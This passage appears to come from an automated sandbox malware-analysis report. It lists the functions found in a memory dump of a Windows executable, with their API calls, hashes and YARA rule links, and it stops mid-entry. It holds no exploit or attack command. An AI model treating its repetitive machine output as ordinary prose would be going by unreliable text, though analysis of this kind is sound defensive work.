                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileLibraryLoadModuleName
                                                                                    • String ID:
                                                                                    • API String ID: 1159719554-0
                                                                                    • Opcode ID: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                                                    • Instruction ID: bfcf378974dcce41ca09e2914a43810c414f47049a433e9fa093b73340916525
                                                                                    • Opcode Fuzzy Hash: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                                                    • Instruction Fuzzy Hash: 46114270A4021CABDB10EB61DC86BDE73B8EB18304F5145FEA508B72D1DB785E848E99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005ABB4C, Relevance: 3.0, APIs: 2, Instructions: 50threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 005ABB9E
                                                                                    • EnumThreadWindows.USER32(00000000,005ABAFC,00000000), ref: 005ABBA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Thread$CurrentEnumWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2396873506-0
                                                                                    • Opcode ID: 2500ecb8bc62876c8ff2405f47f095ea4bb89944262ada6799aa535262b27f39
                                                                                    • Instruction ID: 4b564e7848d778c1821dbee75f023e1981a666a926d985b7d896297b812e440b
                                                                                    • Opcode Fuzzy Hash: 2500ecb8bc62876c8ff2405f47f095ea4bb89944262ada6799aa535262b27f39
                                                                                    • Instruction Fuzzy Hash: 93112574A08744AFD711CF26DC92D6ABFE9E74A710F11A4AAE800D3795EB756C00CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0060BAB8, Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,0060BB15,?,?,?), ref: 0060BAEF
                                                                                    • GetLastError.KERNEL32(00000000,00000000,0060BB15,?,?,?), ref: 0060BAF7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: DeleteErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 2018770650-0
                                                                                    • Opcode ID: 3ac4022b0d504f8d56561d974b577821acbd762e4ecd66f76f585f39e4d74a53
                                                                                    • Instruction ID: 78568c7df48a63312c1550ac91009127c3edb94fe6ea848b53d264e1db3dc997
                                                                                    • Opcode Fuzzy Hash: 3ac4022b0d504f8d56561d974b577821acbd762e4ecd66f76f585f39e4d74a53
                                                                                    • Instruction Fuzzy Hash: 89F0C831B44308ABCB15DFB5AC014AFB7EDDB49310B5189B6F804E3281EB755E005694
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0060BFC4, Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RemoveDirectoryW.KERNEL32(00000000,00000000,0060C021,?,?,00000000), ref: 0060BFFB
                                                                                    • GetLastError.KERNEL32(00000000,00000000,0060C021,?,?,00000000), ref: 0060C003
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: DirectoryErrorLastRemove
                                                                                    • String ID:
                                                                                    • API String ID: 377330604-0
                                                                                    • Opcode ID: 4f11924e44832b53a48258f3fad39eddf14758d76f0ec3ccb02dc41b6ad7c7d0
                                                                                    • Instruction ID: d83f262ecc697e56b821021d063cc9f2e957c9b8bafe74f0302a089c4b99f6ee
                                                                                    • Opcode Fuzzy Hash: 4f11924e44832b53a48258f3fad39eddf14758d76f0ec3ccb02dc41b6ad7c7d0
                                                                                    • Instruction Fuzzy Hash: 28F0C231A44208ABCB04DFB5AC418AFB3EDDB493207518ABAF804E3281EB355E009698
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0060BC90, Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,0060BCEF,?,?), ref: 0060BCC9
                                                                                    • GetLastError.KERNEL32(00000000,00000000,0060BCEF,?,?), ref: 0060BCD1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AttributesErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 1799206407-0
                                                                                    • Opcode ID: 1c121fbd5665a0096efe5b84419c7e24b5e8f66e2a1324fde6f8faf8d5c18489
                                                                                    • Instruction ID: 077669ac207cf36a01174a2dc4ca6ad55a817ede354f0dc89a67c00d07fb0518
                                                                                    • Opcode Fuzzy Hash: 1c121fbd5665a0096efe5b84419c7e24b5e8f66e2a1324fde6f8faf8d5c18489
                                                                                    • Instruction Fuzzy Hash: 74F02830E847089BDB04DF759C0189EB3A9EB0532075187BAF814933C1EB345E008688
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042B840, Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00008000,00000000), ref: 0042B84A
                                                                                    • LoadLibraryW.KERNEL32(00000000,00000000,0042B894,?,00000000,0042B8B2,?,00008000,00000000), ref: 0042B879
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ErrorLibraryLoadMode
                                                                                    • String ID:
                                                                                    • API String ID: 2987862817-0
                                                                                    • Opcode ID: b993803051ae100aefba2c2869379d033386bf384ceaa9f28ae483a43a6be7f1
                                                                                    • Instruction ID: 8ff579c406fa8de576af151128aa35465f0cec1f25fcd6592dc14664995b8e04
                                                                                    • Opcode Fuzzy Hash: b993803051ae100aefba2c2869379d033386bf384ceaa9f28ae483a43a6be7f1
                                                                                    • Instruction Fuzzy Hash: E9F08270614B04BEDF116FB69C5286ABBECE74AB0479349B6F814A2691E67C481086A8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005B8250, Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 005B8297
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: TextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 530164218-0
                                                                                    • Opcode ID: 106e8816436f1c0698a1400b8a78d0a82f037fb7dfb6323774298cdd51175139
                                                                                    • Instruction ID: 55054c52d29fd938ddbce081dc8bbbf905119a19cfde818b1d6f861c0ddb3f35
                                                                                    • Opcode Fuzzy Hash: 106e8816436f1c0698a1400b8a78d0a82f037fb7dfb6323774298cdd51175139
                                                                                    • Instruction Fuzzy Hash: AFF0A7343016002ADB11AB6A8885BFA678CAF95715F0805BAFD049F287CF785D41C3BA
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006AAE7F, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SHGetKnownFolderPath.SHELL32(006CC7F4,00008000,00000000,?,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAE8F
                                                                                    • CoTaskMemFree.OLE32(?,006AAED2,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAEC5
                                                                                    • SHGetKnownFolderPath.SHELL32(006CC804,00008000,00000000,?,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAEE2
                                                                                    • CoTaskMemFree.OLE32(?,006AAF25,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAF18
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FolderFreeKnownPathTask
                                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                    • API String ID: 969438705-544719455
                                                                                    • Opcode ID: d842c7c1da2f123ce9d11a7297303bffa5d20d4a34150eda36a0696f7cbe019c
                                                                                    • Instruction ID: 9ad3a79c7d002b666d6474b190419673809a6fc1a9e74143ce7ee687fd54a3e4
                                                                                    • Opcode Fuzzy Hash: d842c7c1da2f123ce9d11a7297303bffa5d20d4a34150eda36a0696f7cbe019c
                                                                                    • Instruction Fuzzy Hash: E3E09231704704AFE711EBE19C52F2A77EAF749B00F6204A7F400E2A80D734AD10EE25
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006AAED2, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SHGetKnownFolderPath.SHELL32(006CC804,00008000,00000000,?,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAEE2
                                                                                    • CoTaskMemFree.OLE32(?,006AAF25,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAF18
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FolderFreeKnownPathTask
                                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                    • API String ID: 969438705-544719455
                                                                                    • Opcode ID: ac0e4c5cf4e5570656f2ce48f9db2bd67d3f5e148baebc3b6527ce026dfeb88c
                                                                                    • Instruction ID: cd3cf3ec7fba9d7ce51e799f7c5b4265af527ddaa3f41ab80d914f6c7bcac3b9
                                                                                    • Opcode Fuzzy Hash: ac0e4c5cf4e5570656f2ce48f9db2bd67d3f5e148baebc3b6527ce026dfeb88c
                                                                                    • Instruction Fuzzy Hash: A7E092B1744744AEE715AFA0EC52F3A77AAEB49B00F6204BBF500D2A80D7389D00DE15
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004786A4, Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(00000000,000000FC), ref: 004786AB
                                                                                    • DestroyWindow.USER32(00000000,00000000,000000FC,?,?,00614EFE,006B75B7,?,?,?,?,006B8087), ref: 004786B3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Window$DestroyLong
                                                                                    • String ID:
                                                                                    • API String ID: 2871862000-0
                                                                                    • Opcode ID: a0f4de818b6c187177cc114b37eba82a09dd20e37bb5ee93d5eef72e24578566
                                                                                    • Instruction ID: c410a6bbb0581be46f1468b21c97e0a54dad118b04ee59d8e0f801625c1648ef
                                                                                    • Opcode Fuzzy Hash: a0f4de818b6c187177cc114b37eba82a09dd20e37bb5ee93d5eef72e24578566
                                                                                    • Instruction Fuzzy Hash: EAC0126121213026562132792CC98EF008C8C833B93A6862FF824962E2DB4D0D8242AD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00409B58, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(00000000,00409BA6,?,006C4000,006D0B9C,?,?,00409FA9,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409B96
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: 29d77d1977de03f842f62e82ece66a1c881036920cb29be16d73caabd79fdd10
                                                                                    • Instruction ID: 389971a1f4baea938d1d0fa213264d1b5a13cd789ecb9c39f2161e3fb8af8bd3
                                                                                    • Opcode Fuzzy Hash: 29d77d1977de03f842f62e82ece66a1c881036920cb29be16d73caabd79fdd10
                                                                                    • Instruction Fuzzy Hash: 03F090316057059EE3314F0AB880F13BBACFB49774B65047BD848A2792D3B9BC00C5A4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004236F4, Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,?,?,00443D44,00469959,00000000,00469A44,?,?,00443D44), ref: 0042373D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 076ec8ae1f58cb05293f27f07419deb19f562ae2ab51ba9545379dba31c7bb51
                                                                                    • Instruction ID: 8dfed55e6d8a22672dc3f1ffa9947b8613efbdeb4d3f47b158d81c1b607e3982
                                                                                    • Opcode Fuzzy Hash: 076ec8ae1f58cb05293f27f07419deb19f562ae2ab51ba9545379dba31c7bb51
                                                                                    • Instruction Fuzzy Hash: 46E0DFE3B401243AF7206AAE9C82F6B9159CB81776F16023AFB50EB2D1C159DC0082EC
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005C72F8, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CAC2A,00000000,005CAC7B,?,005CAE5C), ref: 005C7317
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FormatMessage
                                                                                    • String ID:
                                                                                    • API String ID: 1306739567-0
                                                                                    • Opcode ID: 92174c62a2c45d8a2c12e6bf488df06399d2689c0495a4d8e1833499a2fb33bf
                                                                                    • Instruction ID: 641584d36dbd7fbf743d3cd11ed81fd1cc40cbed176580940663114c4c94ec85
                                                                                    • Opcode Fuzzy Hash: 92174c62a2c45d8a2c12e6bf488df06399d2689c0495a4d8e1833499a2fb33bf
                                                                                    • Instruction Fuzzy Hash: E5E0D8607983452BE33465984C03F7A1649A7C4F01FA44C3D7A008E6D5D6AA9855A696
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005C5584, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
